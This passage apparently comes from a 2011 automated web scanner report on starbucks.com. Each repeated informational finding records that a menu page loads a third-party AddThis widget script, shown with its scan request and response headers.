<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.110. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-pumpkin-spice-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-pumpkin-spice-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:21 GMT
Connection: close
Content-Length: 43394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.111. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-skinny-flavored-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-skinny-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:31 GMT
Connection: close
Content-Length: 43073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.112. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-toffee-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-toffee-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:34 GMT
Connection: close
Content-Length: 42845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.113. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:34 GMT
Connection: close
Content-Length: 43019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.114. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/peppermint-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:38 GMT
Connection: close
Content-Length: 43447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.115. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/peppermint-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:49 GMT
Connection: close
Content-Length: 43238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.116. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/pumpkin-spice-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/pumpkin-spice-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:25 GMT
Connection: close
Content-Length: 43526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.117. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/skinny-caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:29 GMT
Connection: close
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.118. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:30 GMT
Connection: close
Content-Length: 43541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.119. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-flavored-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/skinny-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:33 GMT
Connection: close
Content-Length: 43246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.120. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/toffee-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/toffee-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:36 GMT
Connection: close
Content-Length: 42742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.121. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:45 GMT
Connection: close
Content-Length: 43438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.122. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:23 GMT
Connection: close
Content-Length: 52308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.123. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:30 GMT
Connection: close
Content-Length: 45234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.124. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:36 GMT
Connection: close
Content-Length: 44795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.125. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:33 GMT
Connection: close
Content-Length: 43276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.126. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:39 GMT
Connection: close
Content-Length: 45066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.127. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:41 GMT
Connection: close
Content-Length: 43051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.128. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:22 GMT
Connection: close
Content-Length: 45037

